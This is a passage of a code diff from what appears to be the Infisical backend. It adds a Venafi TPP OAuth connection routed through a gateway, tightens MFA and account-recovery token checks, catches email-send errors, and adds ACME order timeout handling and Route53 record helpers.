+ // eslint-disable-next-line no-nested-ternary + const targetPort = url.port ? Number(url.port) : url.protocol === "https:" ? 443 : 80; + + const gatewayConnectionDetails = await gatewayV2Service.getPlatformConnectionDetailsByGatewayId({ + gatewayId, + targetHost, + targetPort + }); + + if (!gatewayConnectionDetails) { + throw new BadRequestError({ + message: "Venafi TPP connections only support v2 gateways. Please attach a v2 gateway to this connection." 
+ }); + } + + return withGatewayV2Proxy( + async (proxyPort) => { + const isHttps = url.protocol === "https:"; + url.host = `localhost:${proxyPort}`; + + const finalRequestConfig: AxiosRequestConfig = { + ...requestConfig, + url: url.toString(), + headers: { + ...requestConfig.headers, + Host: targetHost + }, + ...(isHttps && { + httpsAgent: new https.Agent({ + servername: targetHost + }) + }) + }; + + try { + return await request.request(finalRequestConfig); + } catch (error) { + if (error instanceof AxiosError) { + logger.error( + { message: error.message, data: (error.response as undefined | { data: unknown })?.data }, + "Error during Venafi TPP gateway request:" + ); + } + throw error; + } + }, + { + protocol: GatewayProxyProtocol.Tcp, + relayHost: gatewayConnectionDetails.relayHost, + gateway: gatewayConnectionDetails.gateway, + relay: gatewayConnectionDetails.relay + } + ); +}; + +/** + * Authenticates with Venafi TPP via OAuth and returns an access token. + */ +export const authenticateVenafiTpp = async ( + { credentials, ...appConnection }: { gatewayId?: string | null; credentials: TVenafiTppCredentials }, + gatewayV2Service: Pick +): Promise => { + const { tppUrl, clientId, username, password } = credentials; + const baseUrl = normalizeTppUrl(tppUrl); + + logger.info("Venafi TPP: Authenticating via OAuth token endpoint"); + + const { data } = await requestWithVenafiTppGateway(appConnection, gatewayV2Service, { + method: "POST", + url: `${baseUrl}/vedauth/authorize/oauth`, + data: { + client_id: clientId, + username, + password, + scope: "certificate:manage,discover,revoke;configuration" + } + }); + + logger.info("Venafi TPP: Successfully obtained access token"); + + return data; +}; + +/** + * Revokes a Venafi TPP access token. 
+ */ +export const revokeVenafiTppToken = async ( + { credentials, ...appConnection }: { gatewayId?: string | null; credentials: { tppUrl: string } }, + accessToken: string, + gatewayV2Service: Pick +): Promise => { + const baseUrl = normalizeTppUrl(credentials.tppUrl); + + try { + await requestWithVenafiTppGateway(appConnection, gatewayV2Service, { + method: "GET", + url: `${baseUrl}/vedauth/revoke/token`, + headers: { + Authorization: `Bearer ${accessToken}` + } + }); + logger.info("Venafi TPP: Successfully revoked access token"); + } catch (error) { + logger.warn(error, "Venafi TPP: Failed to revoke access token"); + } +}; + +export const getVenafiTppHeaders = (accessToken: string) => ({ + Authorization: `Bearer ${accessToken}`, + "Content-Type": "application/json" +}); + +export const getVenafiTppConnectionListItem = () => { + return { + name: "Venafi TPP" as const, + app: AppConnection.VenafiTpp as const, + methods: Object.values(VenafiTppConnectionMethod) as [VenafiTppConnectionMethod.OAuth] + }; +}; + +export const validateVenafiTppConnectionCredentials = async ( + config: TVenafiTppConnectionConfig, + gatewayV2Service: Pick +) => { + const credentials = config.credentials as TVenafiTppCredentials; + const { tppUrl } = credentials; + + logger.info({ tppUrl }, "Venafi TPP: Validating connection credentials"); + + let accessToken: string | undefined; + try { + const authResponse = await authenticateVenafiTpp({ gatewayId: config.gatewayId, credentials }, gatewayV2Service); + accessToken = authResponse.access_token; + + logger.info( + { + tppUrl, + identity: authResponse.identity, + scope: authResponse.scope + }, + "Venafi TPP: Credential validation successful" + ); + } catch (error: unknown) { + if (error instanceof BadRequestError) { + throw error; + } + if (error instanceof AxiosError) { + const statusCode = error.response?.status; + const errorMessage = + // eslint-disable-next-line @typescript-eslint/no-unsafe-member-access + 
(error.response?.data?.error_description as string) || + // eslint-disable-next-line @typescript-eslint/no-unsafe-member-access + (error.response?.data?.error as string) || + error.message; + + logger.error({ tppUrl, statusCode, errorMessage }, "Venafi TPP: Failed to validate credentials"); + + throw new BadRequestError({ + message: `Failed to validate Venafi TPP credentials: ${errorMessage}` + }); + } + logger.error(error, "Venafi TPP: Unexpected error during credential validation"); + throw new BadRequestError({ + message: `Failed to validate Venafi TPP credentials: ${(error as Error)?.message || "Unknown error"}` + }); + } finally { + if (accessToken) { + await revokeVenafiTppToken({ gatewayId: config.gatewayId, credentials }, accessToken, gatewayV2Service); + } + } + + return config.credentials; +}; diff --git a/backend/src/services/app-connection/venafi-tpp/venafi-tpp-connection-schemas.ts b/backend/src/services/app-connection/venafi-tpp/venafi-tpp-connection-schemas.ts new file mode 100644 index 00000000000..aff8c0d796f --- /dev/null +++ b/backend/src/services/app-connection/venafi-tpp/venafi-tpp-connection-schemas.ts @@ -0,0 +1,85 @@ +import z from "zod"; + +import { AppConnections } from "@app/lib/api-docs"; +import { AppConnection } from "@app/services/app-connection/app-connection-enums"; +import { + BaseAppConnectionSchema, + GenericCreateAppConnectionFieldsSchema, + GenericUpdateAppConnectionFieldsSchema +} from "@app/services/app-connection/app-connection-schemas"; + +import { APP_CONNECTION_NAME_MAP } from "../app-connection-maps"; +import { VenafiTppConnectionMethod } from "./venafi-tpp-connection-enums"; + +export const VenafiTppOAuthCredentialsSchema = z.object({ + tppUrl: z + .string() + .trim() + .min(1, "TPP URL required") + .max(512) + .refine((value) => value.startsWith("https://"), "TPP URL must use HTTPS") + .describe(AppConnections.CREDENTIALS.VENAFI_TPP.tppUrl), + clientId: z + .string() + .trim() + .min(1, "Client ID required") + 
.max(255) + .describe(AppConnections.CREDENTIALS.VENAFI_TPP.clientId), + username: z + .string() + .trim() + .min(1, "Username required") + .max(255) + .describe(AppConnections.CREDENTIALS.VENAFI_TPP.username), + password: z + .string() + .trim() + .min(1, "Password required") + .max(255) + .describe(AppConnections.CREDENTIALS.VENAFI_TPP.password) +}); + +const BaseVenafiTppConnectionSchema = BaseAppConnectionSchema.extend({ app: z.literal(AppConnection.VenafiTpp) }); + +export const VenafiTppConnectionSchema = BaseVenafiTppConnectionSchema.extend({ + method: z.literal(VenafiTppConnectionMethod.OAuth), + credentials: VenafiTppOAuthCredentialsSchema +}); + +export const SanitizedVenafiTppConnectionSchema = z.discriminatedUnion("method", [ + BaseVenafiTppConnectionSchema.extend({ + method: z.literal(VenafiTppConnectionMethod.OAuth), + credentials: VenafiTppOAuthCredentialsSchema.pick({ + tppUrl: true, + clientId: true, + username: true + }) + }).describe(JSON.stringify({ title: `${APP_CONNECTION_NAME_MAP[AppConnection.VenafiTpp]} (OAuth)` })) +]); + +export const ValidateVenafiTppConnectionCredentialsSchema = z.discriminatedUnion("method", [ + z.object({ + method: z.literal(VenafiTppConnectionMethod.OAuth).describe(AppConnections.CREATE(AppConnection.VenafiTpp).method), + credentials: VenafiTppOAuthCredentialsSchema.describe(AppConnections.CREATE(AppConnection.VenafiTpp).credentials) + }) +]); + +export const CreateVenafiTppConnectionSchema = ValidateVenafiTppConnectionCredentialsSchema.and( + GenericCreateAppConnectionFieldsSchema(AppConnection.VenafiTpp, { supportsGateways: true }) +); + +export const UpdateVenafiTppConnectionSchema = z + .object({ + credentials: VenafiTppOAuthCredentialsSchema.optional().describe( + AppConnections.UPDATE(AppConnection.VenafiTpp).credentials + ) + }) + .and(GenericUpdateAppConnectionFieldsSchema(AppConnection.VenafiTpp, { supportsGateways: true })); + +export const VenafiTppConnectionListItemSchema = z + .object({ + name: 
z.literal("Venafi TPP"), + app: z.literal(AppConnection.VenafiTpp), + methods: z.nativeEnum(VenafiTppConnectionMethod).array() + }) + .describe(JSON.stringify({ title: APP_CONNECTION_NAME_MAP[AppConnection.VenafiTpp] })); diff --git a/backend/src/services/app-connection/venafi-tpp/venafi-tpp-connection-types.ts b/backend/src/services/app-connection/venafi-tpp/venafi-tpp-connection-types.ts new file mode 100644 index 00000000000..5a4e665a40e --- /dev/null +++ b/backend/src/services/app-connection/venafi-tpp/venafi-tpp-connection-types.ts @@ -0,0 +1,25 @@ +import z from "zod"; + +import { DiscriminativePick } from "@app/lib/types"; + +import { AppConnection } from "../app-connection-enums"; +import { + CreateVenafiTppConnectionSchema, + ValidateVenafiTppConnectionCredentialsSchema, + VenafiTppConnectionSchema +} from "./venafi-tpp-connection-schemas"; + +export type TVenafiTppConnection = z.infer; + +export type TVenafiTppConnectionInput = z.infer & { + app: AppConnection.VenafiTpp; +}; + +export type TValidateVenafiTppConnectionCredentialsSchema = typeof ValidateVenafiTppConnectionCredentialsSchema; + +export type TVenafiTppConnectionConfig = DiscriminativePick< + TVenafiTppConnectionInput, + "method" | "app" | "credentials" | "gatewayId" +> & { + orgId: string; +}; diff --git a/backend/src/services/auth-token/auth-token-service.ts b/backend/src/services/auth-token/auth-token-service.ts index c15444f76d0..b1892d89bab 100644 --- a/backend/src/services/auth-token/auth-token-service.ts +++ b/backend/src/services/auth-token/auth-token-service.ts @@ -290,6 +290,10 @@ export const tokenServiceFactory = ({ tokenDAL, userDAL, orgDAL, keyStore }: TAu ); if (!user || !user.isAccepted) throw new NotFoundError({ message: `User with ID '${session.userId}' not found` }); + if (user.isLocked || (user.temporaryLockDateEnd && new Date() < user.temporaryLockDateEnd)) { + throw new UnauthorizedError({ message: "Account is locked" }); + } + let orgId = ""; let orgName = ""; let 
rootOrgId = ""; diff --git a/backend/src/services/auth/auth-fns.ts b/backend/src/services/auth/auth-fns.ts index 54bbc8a414f..e99406f1f62 100644 --- a/backend/src/services/auth/auth-fns.ts +++ b/backend/src/services/auth/auth-fns.ts @@ -3,7 +3,7 @@ import { request } from "@app/lib/config/request"; import { crypto } from "@app/lib/crypto"; import { BadRequestError, ForbiddenRequestError, UnauthorizedError } from "@app/lib/errors"; -import { AuthModeSignUpTokenPayload, AuthTokenType } from "./auth-type"; +import { AuthModeAccountRecoveryTokenPayload, AuthModeSignUpTokenPayload, AuthTokenType } from "./auth-type"; export const extractBearerToken = (token?: string): string => { if (!token) { @@ -43,9 +43,9 @@ export const validatePasswordResetAuthorization = (token?: string) => { const appCfg = getConfig(); const authTokenValue = extractBearerToken(token); - const decodedToken = crypto.jwt().verify(authTokenValue, appCfg.AUTH_SECRET) as AuthModeSignUpTokenPayload; + const decodedToken = crypto.jwt().verify(authTokenValue, appCfg.AUTH_SECRET) as AuthModeAccountRecoveryTokenPayload; - if (decodedToken.authTokenType !== AuthTokenType.SIGNUP_TOKEN) { + if (decodedToken.authTokenType !== AuthTokenType.ACCOUNT_RECOVERY_TOKEN) { throw new UnauthorizedError({ message: `The provided authentication token type is not supported.` }); diff --git a/backend/src/services/auth/auth-login-service.ts b/backend/src/services/auth/auth-login-service.ts index b8c5cf8fcae..22c9bdbd2bd 100644 --- a/backend/src/services/auth/auth-login-service.ts +++ b/backend/src/services/auth/auth-login-service.ts @@ -12,7 +12,7 @@ import { EventType, TAuditLogServiceFactory } from "@app/ee/services/audit-log/a import { OrgPermissionSsoActions, OrgPermissionSubjects } from "@app/ee/services/permission/org-permission"; import { isAuthMethodSaml } from "@app/ee/services/permission/permission-fns"; import { TPermissionServiceFactory } from "@app/ee/services/permission/permission-service-types"; -import { 
KeyStorePrefixes, TKeyStoreFactory } from "@app/keystore/keystore"; +import { KeyStorePrefixes, KeyStoreTtls, TKeyStoreFactory } from "@app/keystore/keystore"; import { getConfig } from "@app/lib/config/env"; import { crypto, generateSrpServerKey, srpCheckClientProof } from "@app/lib/crypto"; import { getUserPrivateKey } from "@app/lib/crypto/srp"; @@ -25,6 +25,8 @@ import { } from "@app/lib/errors"; import { getMinExpiresIn, removeTrailingSlash } from "@app/lib/fn"; import { logger } from "@app/lib/logger"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { AuthAttemptAuthMethod, AuthAttemptAuthResult, authAttemptCounter } from "@app/lib/telemetry/metrics"; import { sanitizeEmail, validateEmail } from "@app/lib/validator"; import { getUserAgentType } from "@app/server/plugins/audit-log"; @@ -38,7 +40,7 @@ import { TNotificationServiceFactory } from "../notification/notification-servic import { NotificationType } from "../notification/notification-types"; import { TOrgDALFactory } from "../org/org-dal"; import { getDefaultOrgMembershipRole } from "../org/org-role-fns"; -import { SmtpTemplates, TSmtpService } from "../smtp/smtp-service"; +import { SmtpTemplates, throwIfSmtpError, TSmtpService } from "../smtp/smtp-service"; import { LoginMethod } from "../super-admin/super-admin-types"; import { TTotpServiceFactory } from "../totp/totp-service"; import { TUserDALFactory } from "../user/user-dal"; @@ -115,17 +117,19 @@ export const authLoginServiceFactory = ({ ]); if (user.email) { - await smtpService.sendMail({ - template: SmtpTemplates.NewDeviceJoin, - subjectLine: "Successful login from new device", - recipients: [user.email], - substitutions: { - email: user.email, - timestamp: new Date().toString(), - ip, - userAgent - } - }); + await smtpService + .sendMail({ + template: SmtpTemplates.NewDeviceJoin, + subjectLine: "Successful login from new device", + 
recipients: [user.email], + substitutions: { + email: user.email, + timestamp: new Date().toString(), + ip, + userAgent + } + }) + .catch((err) => logger.error(err, "Failed to send new device login email")); } } }; @@ -140,14 +144,16 @@ export const authLoginServiceFactory = ({ userId }); - await smtpService.sendMail({ - template: SmtpTemplates.EmailMfa, - subjectLine: "Infisical MFA code", - recipients: [email], - substitutions: { - code - } - }); + await smtpService + .sendMail({ + template: SmtpTemplates.EmailMfa, + subjectLine: "Infisical MFA code", + recipients: [email], + substitutions: { + code + } + }) + .catch((err) => throwIfSmtpError(err, "Failed to send MFA code email")); }; /* @@ -194,7 +200,8 @@ export const authLoginServiceFactory = ({ authTokenType: AuthTokenType.MFA_TOKEN, userId, organizationId, - email + email, + requiredMfaMethod }, appCfg.AUTH_SECRET, { expiresIn: appCfg.JWT_MFA_LIFETIME } @@ -250,7 +257,9 @@ export const authLoginServiceFactory = ({ let refreshTokenExpiresIn: string | number = cfg.JWT_REFRESH_LIFETIME; if (organizationId) { - const org = await orgDAL.findById(organizationId); + const org = await requestMemoize(requestMemoKeys.orgFindById(organizationId), () => + orgDAL.findById(organizationId) + ); if (org) { await membershipUserDAL.update( { actorUserId: userId, scopeOrgId: org.id, scope: AccessScope.Organization }, @@ -596,7 +605,13 @@ export const authLoginServiceFactory = ({ * Multi factor authentication re-send code, Get user id from token * saved in frontend */ - const resendMfaToken = async (userId: string) => { + const resendMfaToken = async (userId: string, requiredMfaMethod: MfaMethod) => { + if (requiredMfaMethod !== MfaMethod.EMAIL) { + throw new BadRequestError({ + message: "Email MFA code cannot be sent when a different MFA method is required" + }); + } + const user = await userDAL.findById(userId); if (!user || !user.email) return; enforceUserLockStatus(Boolean(user.isLocked), user.temporaryLockDateEnd); @@ 
-663,6 +678,7 @@ export const authLoginServiceFactory = ({ userId, mfaToken, mfaMethod, + requiredMfaMethod, mfaJwtToken, ip, userAgent, @@ -673,6 +689,12 @@ export const authLoginServiceFactory = ({ const user = await userDAL.findById(userId); try { + if (mfaMethod !== requiredMfaMethod) { + throw new BadRequestError({ + message: `Invalid MFA method. ${requiredMfaMethod} verification is required.` + }); + } + enforceUserLockStatus(Boolean(user.isLocked), user.temporaryLockDateEnd); if (mfaMethod === MfaMethod.EMAIL) { await tokenService.validateTokenForUser({ @@ -740,7 +762,11 @@ export const authLoginServiceFactory = ({ }); // Mark that an unlock email was sent, expires after 5 minutes - await keyStore.setItemWithExpiry(KeyStorePrefixes.UserMfaUnlockEmailSent(userId), 300, "1"); + await keyStore.setItemWithExpiry( + KeyStorePrefixes.UserMfaUnlockEmailSent(userId), + KeyStoreTtls.UserMfaUnlockEmailSentInSeconds, + "1" + ); } } catch (lockErr) { if (lock) { @@ -909,7 +935,9 @@ export const authLoginServiceFactory = ({ ); if (authMethod === AuthMethod.GITHUB && serverCfg.defaultAuthOrgId && !appCfg.isCloud) { - const defaultOrg = await orgDAL.findOrgById(serverCfg.defaultAuthOrgId); + const defaultOrg = await requestMemoize(requestMemoKeys.orgFindOrgById(serverCfg.defaultAuthOrgId), () => + orgDAL.findOrgById(serverCfg.defaultAuthOrgId as string) + ); if (!defaultOrg) { throw new BadRequestError({ message: `Failed to find default organization with ID ${serverCfg.defaultAuthOrgId}` @@ -1070,7 +1098,7 @@ export const authLoginServiceFactory = ({ await smtpService.sendMail({ template: SmtpTemplates.EmailVerification, - subjectLine: "Infisical confirmation code", + subjectLine: `Infisical confirmation code: ${verificationCode}`, recipients: [user.email], substitutions: { code: verificationCode @@ -1140,7 +1168,9 @@ export const authLoginServiceFactory = ({ }); } - const selectedOrg = await orgDAL.findById(organizationId); + const selectedOrg = await 
requestMemoize(requestMemoKeys.orgFindById(organizationId), () => + orgDAL.findById(organizationId) + ); if (!selectedOrg) { throw new NotFoundError({ message: `Organization with ID '${organizationId}' not found` }); } @@ -1156,7 +1186,9 @@ export const authLoginServiceFactory = ({ }); } - rootOrg = await orgDAL.findById(selectedOrg.rootOrgId); + rootOrg = await requestMemoize(requestMemoKeys.orgFindById(selectedOrg.rootOrgId), () => + orgDAL.findById(selectedOrg.rootOrgId as string) + ); if (!rootOrg) { throw new BadRequestError({ message: "Invalid sub-organization" @@ -1314,19 +1346,21 @@ export const authLoginServiceFactory = ({ })) ); - await smtpService.sendMail({ - recipients: adminEmails, - subjectLine: "Security Alert: SSO Bypass", - substitutions: { - email: user.email, - timestamp: new Date().toISOString(), - ip: ipAddress, - userAgent, - siteUrl: removeTrailingSlash(cfg.SITE_URL || "https://app.infisical.com"), - orgId: organizationId - }, - template: SmtpTemplates.OrgAdminBreakglassAccess - }); + await smtpService + .sendMail({ + recipients: adminEmails, + subjectLine: "Security Alert: SSO Bypass", + substitutions: { + email: user.email, + timestamp: new Date().toISOString(), + ip: ipAddress, + userAgent, + siteUrl: removeTrailingSlash(cfg.SITE_URL || "https://app.infisical.com"), + orgId: organizationId + }, + template: SmtpTemplates.OrgAdminBreakglassAccess + }) + .catch((err) => logger.error(err, "Failed to send SSO bypass alert email")); } } diff --git a/backend/src/services/auth/auth-login-type.ts b/backend/src/services/auth/auth-login-type.ts index 29b58c6a321..18a58a1c8c1 100644 --- a/backend/src/services/auth/auth-login-type.ts +++ b/backend/src/services/auth/auth-login-type.ts @@ -20,6 +20,7 @@ export type TVerifyMfaTokenDTO = { userId: string; mfaToken: string; mfaMethod: MfaMethod; + requiredMfaMethod: MfaMethod; mfaJwtToken: string; ip: string; userAgent: string; diff --git a/backend/src/services/auth/auth-signup-service.ts 
b/backend/src/services/auth/auth-signup-service.ts index 2025ed57590..1264c7ea624 100644 --- a/backend/src/services/auth/auth-signup-service.ts +++ b/backend/src/services/auth/auth-signup-service.ts @@ -2,13 +2,14 @@ import { AccessScope, OrgMembershipStatus } from "@app/db/schemas"; import { getConfig } from "@app/lib/config/env"; import { crypto } from "@app/lib/crypto/cryptography"; import { BadRequestError, UnauthorizedError } from "@app/lib/errors"; +import { logger } from "@app/lib/logger"; import { isDisposableEmail, sanitizeEmail, validateEmail } from "@app/lib/validator"; import { TAuthTokenServiceFactory } from "../auth-token/auth-token-service"; import { TokenType } from "../auth-token/auth-token-types"; import { TOrgDALFactory } from "../org/org-dal"; import { TOrgServiceFactory } from "../org/org-service"; -import { SmtpTemplates, TSmtpService } from "../smtp/smtp-service"; +import { SmtpTemplates, throwIfSmtpError, TSmtpService } from "../smtp/smtp-service"; import { TUserDALFactory } from "../user/user-dal"; import { TUserAliasDALFactory } from "../user-alias/user-alias-dal"; import { TAuthDALFactory } from "./auth-dal"; @@ -56,16 +57,20 @@ export const authSignupServiceFactory = ({ // Send informational email for existing accounts instead of throwing error // This prevents user enumeration vulnerability const appCfg = getConfig(); - await smtpService.sendMail({ - template: SmtpTemplates.SignupExistingAccount, - subjectLine: "Sign-up Request for Your Infisical Account", - recipients: [sanitizedEmail], - substitutions: { - email: sanitizedEmail, - loginUrl: `${appCfg.SITE_URL}/login`, - resetPasswordUrl: `${appCfg.SITE_URL}/account-recovery` - } - }); + await smtpService + .sendMail({ + template: SmtpTemplates.SignupExistingAccount, + subjectLine: "Sign-up Request for Your Infisical Account", + recipients: [sanitizedEmail], + substitutions: { + email: sanitizedEmail, + loginUrl: `${appCfg.SITE_URL}/login`, + resetPasswordUrl: 
`${appCfg.SITE_URL}/account-recovery` + } + }) + .catch((err) => + logger.error(err, "Failed to send existing account email β€” swallowing to prevent user enumeration") + ); return; } @@ -84,14 +89,16 @@ export const authSignupServiceFactory = ({ userId: user.id }); - await smtpService.sendMail({ - template: SmtpTemplates.SignupEmailVerification, - subjectLine: "Infisical confirmation code", - recipients: [sanitizedEmail], - substitutions: { - code: token - } - }); + await smtpService + .sendMail({ + template: SmtpTemplates.SignupEmailVerification, + subjectLine: `Infisical confirmation code: ${token}`, + recipients: [sanitizedEmail], + substitutions: { + code: token + } + }) + .catch((err) => throwIfSmtpError(err, "Failed to send signup verification email")); }; const verifyEmailSignup = async (email: string, code: string) => { @@ -164,9 +171,10 @@ export const authSignupServiceFactory = ({ // whether the request is valid. This prevents timing-based user/alias enumeration. let authMethod: AuthMethod; let organizationId: string | undefined; + let isInvitedUser = false; if (dto.type === CompleteAccountType.Email) { // Determine rejection before hashing, but don't throw yet - const shouldReject = !user || user.isAccepted; + const shouldReject = !user || user.isAccepted || Boolean(decodedToken?.aliasId); // Always hash the password so bcrypt cost is incurred regardless of validity const hashedPassword = await crypto.hashing().createHash(dto.password, appCfg.SALT_ROUNDS); @@ -190,7 +198,7 @@ export const authSignupServiceFactory = ({ }, { tx } ); - const isInvitedUser = existingMemberships.length > 0; + isInvitedUser = existingMemberships.length > 0; if (!isInvitedUser && dto.organizationName) { const org = await orgService.createOrganization( { @@ -289,7 +297,8 @@ export const authSignupServiceFactory = ({ accessToken: tokens.access, refreshToken: tokens.refresh, authMethod, - organizationId + organizationId, + isInvitedUser }; }; diff --git 
a/backend/src/services/auth/auth-type.ts b/backend/src/services/auth/auth-type.ts index 3c1e2f83ed6..1374bcf0859 100644 --- a/backend/src/services/auth/auth-type.ts +++ b/backend/src/services/auth/auth-type.ts @@ -21,7 +21,9 @@ export enum AuthTokenType { SERVICE_ACCESS_TOKEN = "serviceAccessToken", SERVICE_REFRESH_TOKEN = "serviceRefreshToken", IDENTITY_ACCESS_TOKEN = "identityAccessToken", - SCIM_TOKEN = "scimToken" + SCIM_TOKEN = "scimToken", + GATEWAY_ACCESS_TOKEN = "gatewayAccessToken", + ACCOUNT_RECOVERY_TOKEN = "accountRecoveryToken" } // Result state from processProviderCallback β€” determines what the route handler should do @@ -38,7 +40,8 @@ export enum AuthMode { API_KEY = "apiKey", IDENTITY_ACCESS_TOKEN = "identityAccessToken", SCIM_TOKEN = "scimToken", - MCP_JWT = "mcpJwt" + MCP_JWT = "mcpJwt", + GATEWAY_ACCESS_TOKEN = "gatewayAccessToken" } export enum ActorType { // would extend to AWS, Azure, ... @@ -52,9 +55,17 @@ export enum ActorType { // would extend to AWS, Azure, ... 
ACME_ACCOUNT = "acmeAccount", EST_ACCOUNT = "estAccount", SCEP_ACCOUNT = "scepAccount", - UNKNOWN_USER = "unknownUser" + UNKNOWN_USER = "unknownUser", + GATEWAY = "gateway" } +export type TGatewayAccessTokenJwtPayload = { + authTokenType: AuthTokenType.GATEWAY_ACCESS_TOKEN; + gatewayId: string; + orgId: string; + tokenVersion: number; +}; + // This will be null unless the token-type is JWT export type ActorAuthMethod = AuthMethod | null; @@ -78,6 +89,7 @@ export type AuthModeMfaJwtTokenPayload = { authMethod: AuthMethod; userId: string; organizationId?: string; + requiredMfaMethod: MfaMethod; }; export type AuthModeRefreshJwtTokenPayload = { @@ -107,6 +119,11 @@ export type AuthModeSignUpTokenPayload = { lastName?: string; }; +export type AuthModeAccountRecoveryTokenPayload = { + authTokenType: AuthTokenType.ACCOUNT_RECOVERY_TOKEN; + userId: string; +}; + export enum MfaMethod { EMAIL = "email", TOTP = "totp", diff --git a/backend/src/services/certificate-authority/acme/acme-certificate-authority-errors.ts b/backend/src/services/certificate-authority/acme/acme-certificate-authority-errors.ts new file mode 100644 index 00000000000..1853b9f1344 --- /dev/null +++ b/backend/src/services/certificate-authority/acme/acme-certificate-authority-errors.ts @@ -0,0 +1,79 @@ +/* eslint-disable max-classes-per-file */ +import RE2 from "re2"; + +import { logger } from "@app/lib/logger"; + +export const ACME_ORDER_TIMEOUT_MS = 5 * 60 * 1000; + +export class AcmeOrderTimeoutError extends Error { + constructor(message: string) { + super(message); + this.name = "AcmeOrderTimeoutError"; + } +} + +export class AcmeRateLimitError extends Error { + constructor(message: string) { + super(message); + this.name = "AcmeRateLimitError"; + } +} + +const ACME_ERROR_URN_PREFIX = "urn:ietf:params:acme:error:"; + +const RATE_LIMIT_URN = `${ACME_ERROR_URN_PREFIX}rateLimited`; + +const RATE_LIMITED_WORD_RE = new RE2("\\brateLimited\\b", "i"); + +export const isAcmeRateLimitError = (error: unknown): 
boolean => { + if (!(error instanceof Error)) return false; + return error.message.includes(RATE_LIMIT_URN) || RATE_LIMITED_WORD_RE.test(error.message); +}; + +const formatTimeoutDuration = (timeoutMs: number): string => { + const totalSeconds = Math.round(timeoutMs / 1000); + if (totalSeconds % 60 === 0) { + const minutes = totalSeconds / 60; + return `${minutes} minute${minutes === 1 ? "" : "s"}`; + } + return `${totalSeconds} seconds`; +}; + +export const runWithAcmeOrderTimeout = async ( + operationFactory: (signal: AbortSignal) => Promise, + timeoutMs: number +): Promise => { + const controller = new AbortController(); + let timeoutHandle: NodeJS.Timeout | undefined; + const duration = formatTimeoutDuration(timeoutMs); + + const timeoutPromise = new Promise((_, reject) => { + timeoutHandle = setTimeout(() => { + controller.abort(); + reject( + new AcmeOrderTimeoutError( + `ACME order did not complete within ${duration}. Possible causes: the CA is rate-limiting requests, the order is blocked at validation, or the CA is slow to respond.` + ) + ); + }, timeoutMs); + }); + + const operationPromise = operationFactory(controller.signal); + operationPromise.catch((err: unknown) => { + if (controller.signal.aborted) { + logger.debug({ err }, "ACME order operation rejected after timeout"); + } + }); + + try { + return await Promise.race([operationPromise, timeoutPromise]); + } finally { + if (timeoutHandle) clearTimeout(timeoutHandle); + } +}; + +export const throwIfAcmeOrderAborted = (signal: AbortSignal | undefined): void => { + if (signal?.aborted) { + throw new Error("ACME order aborted after timeout"); + } +}; diff --git a/backend/src/services/certificate-authority/acme/acme-certificate-authority-fns.ts b/backend/src/services/certificate-authority/acme/acme-certificate-authority-fns.ts index 05047274eef..5a79bc0c746 100644 --- a/backend/src/services/certificate-authority/acme/acme-certificate-authority-fns.ts +++ 
b/backend/src/services/certificate-authority/acme/acme-certificate-authority-fns.ts @@ -43,8 +43,10 @@ import { getProjectKmsCertificateKeyId } from "@app/services/project/project-fns import { TCertificateAuthorityDALFactory } from "../certificate-authority-dal"; import { CaStatus, CaType } from "../certificate-authority-enums"; import { keyAlgorithmToAlgCfg } from "../certificate-authority-fns"; +import { route53DeleteRecord, route53UpsertRecord } from "../dns-providers/route53"; import { TExternalCertificateAuthorityDALFactory } from "../external-certificate-authority-dal"; import { AcmeDnsProvider } from "./acme-certificate-authority-enums"; +import { throwIfAcmeOrderAborted } from "./acme-certificate-authority-errors"; import { AcmeCertificateAuthorityCredentialsSchema } from "./acme-certificate-authority-schemas"; import { TAcmeCertificateAuthority, @@ -54,7 +56,6 @@ import { import { azureDnsDeleteTxtRecord, azureDnsInsertTxtRecord } from "./dns-providers/azure-dns"; import { cloudflareDeleteTxtRecord, cloudflareInsertTxtRecord } from "./dns-providers/cloudflare"; import { dnsMadeEasyDeleteTxtRecord, dnsMadeEasyInsertTxtRecord } from "./dns-providers/dns-made-easy"; -import { route53DeleteTxtRecord, route53InsertTxtRecord } from "./dns-providers/route54"; const validateDnsResolver = (resolver: string): void => { const appCfg = getConfig(); @@ -295,7 +296,8 @@ export const orderCertificate = async ( signatureAlgorithm, keyAlgorithm, isRenewal, - originalCertificateId + originalCertificateId, + abortSignal }: { caId: string; profileId?: string; @@ -311,6 +313,7 @@ export const orderCertificate = async ( keyAlgorithm?: string; isRenewal?: boolean; originalCertificateId?: string; + abortSignal?: AbortSignal; }, deps: TOrderCertificateDeps, tx?: Knex @@ -422,12 +425,13 @@ export const orderCertificate = async ( switch (acmeCa.configuration.dnsProviderConfig.provider) { case AcmeDnsProvider.Route53: { - await route53InsertTxtRecord( - connection as TAwsConnection, 
- acmeCa.configuration.dnsProviderConfig.hostedZoneId, - recordName, - recordValue - ); + await route53UpsertRecord(connection as TAwsConnection, acmeCa.configuration.dnsProviderConfig.hostedZoneId, { + name: recordName, + type: "TXT", + value: recordValue, + ttl: 30, + comment: "Set ACME challenge TXT record" + }); break; } case AcmeDnsProvider.Cloudflare: { @@ -478,12 +482,13 @@ export const orderCertificate = async ( switch (acmeCa.configuration.dnsProviderConfig.provider) { case AcmeDnsProvider.Route53: { - await route53DeleteTxtRecord( - connection as TAwsConnection, - acmeCa.configuration.dnsProviderConfig.hostedZoneId, - recordName, - recordValue - ); + await route53DeleteRecord(connection as TAwsConnection, acmeCa.configuration.dnsProviderConfig.hostedZoneId, { + name: recordName, + type: "TXT", + value: recordValue, + ttl: 30, + comment: "Delete ACME challenge TXT record" + }); break; } case AcmeDnsProvider.Cloudflare: { @@ -520,6 +525,8 @@ export const orderCertificate = async ( } }); + throwIfAcmeOrderAborted(abortSignal); + const [leafCert, parentCert] = acme.crypto.splitPemChain(pem); const certObj = new x509.X509Certificate(leafCert); @@ -924,7 +931,8 @@ export const AcmeCertificateAuthorityFns = ({ signatureAlgorithm, keyAlgorithm, isRenewal, - originalCertificateId + originalCertificateId, + abortSignal }: { caId: string; profileId?: string; @@ -939,6 +947,7 @@ export const AcmeCertificateAuthorityFns = ({ keyAlgorithm?: string; isRenewal?: boolean; originalCertificateId?: string; + abortSignal?: AbortSignal; }) => { return orderCertificate( { @@ -955,7 +964,8 @@ export const AcmeCertificateAuthorityFns = ({ signatureAlgorithm, keyAlgorithm, isRenewal, - originalCertificateId + originalCertificateId, + abortSignal }, { appConnectionDAL, diff --git a/backend/src/services/certificate-authority/acme/dns-providers/azure-dns.ts 